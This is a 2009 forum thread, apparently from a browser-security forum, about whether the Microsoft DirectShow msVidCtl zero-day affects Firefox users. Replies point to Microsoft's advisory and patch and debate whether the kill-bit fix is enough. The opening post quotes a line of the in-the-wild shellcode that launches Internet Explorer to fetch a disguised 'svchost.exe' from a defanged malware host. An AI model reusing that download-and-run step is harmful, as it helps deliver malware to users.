Microsoft DirectShow vulnerability: are Firefox user

Talk about internet security, computer security, personal security, your social security number...
Post Reply
anthoy
Posts: 9
Joined: Sun Apr 05, 2009 3:01 pm

Microsoft DirectShow vulnerability: are Firefox user

Post by anthoy » Sat Jul 11, 2009 3:08 pm

protected from this attack?

This is a 0 day exploit, that attack MPEG2TuneRequest ActiveX Control Object in the msVidCtl component of Microsoft DirectShow:
http://translate.google.com/translate?p ... ry_state0=

So does this affect IE user only?

I think it doesn't affect IE user only, because the shellcode force IE to launch

Code: Select all

C:\%programfiles%\Internet Explorer\iexplore.exe
"hxxp://milllk.com/wm/svchost.exe"


This user has tried with Opera browser:
http://www.wilderssecurity.com/showpost ... stcount=53

What do you think?

Can a script or shellcode access to filesystem and launch an application?
This is a my old question:
viewtopic.php?f=19&t=361
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: Microsoft DirectShow vulnerability: are Firefox user

Post by Alan Baxter » Sat Jul 11, 2009 5:12 pm

The vulnerability described in Microsoft Security Advisory 971778 potentially affects all users of Windows 2000, Windows XP, and Windows Server 2003. It does not depend on what browser you're using. Apply the fix provided on this page, http://support.microsoft.com/kb/971778, or wait until next Tuesday when it will be fixed with a Microsoft Update.
http://www.microsoft.com/technet/securi ... 71778.mspx
http://www.computerworld.com/s/article/9135354
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: Microsoft DirectShow vulnerability: are Firefox user

Post by luntrus » Wed Jul 22, 2009 6:24 pm

Hi forum friends,

This bug goes much deeper than was thought at first, re:
http://addxorrol.blogspot.com/2009/07/p ... tldll.html
The patch which consisted in setting a kill-bit did nothing fundamentally about the underlying hole, this issue was commented here:
http://blog.ncircle.com/blogs/vert/arch ... nough.html

Micosoft knew about the issue for over one year and had already started to contemplate a patch for it as they got startled by seeing this deep bug that could transgress to third party software being abused in the wild. An out of band patch might be in the bargain if more abuse is seen. The hole deep inside Windows seems to be exploitable in various other ways, so setting a kill-bit is not enough.
So MS could have unwillingly introduced leaks into third party software that would not be so easily patched.
What can we do using NoScript against this bug a skeleton that has now crept out of the Microsoft cupboard?
SafeArray another bad concept for a global standard? Horrendously cruddy........the outset is simple, but it rapidly degrades into the stinking mess you see today because the design flaws are right at the center, and are going to haunt us rather sooner than later....

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2pre) Gecko/20090722 Shiretoko/3.5.2pre

Post Reply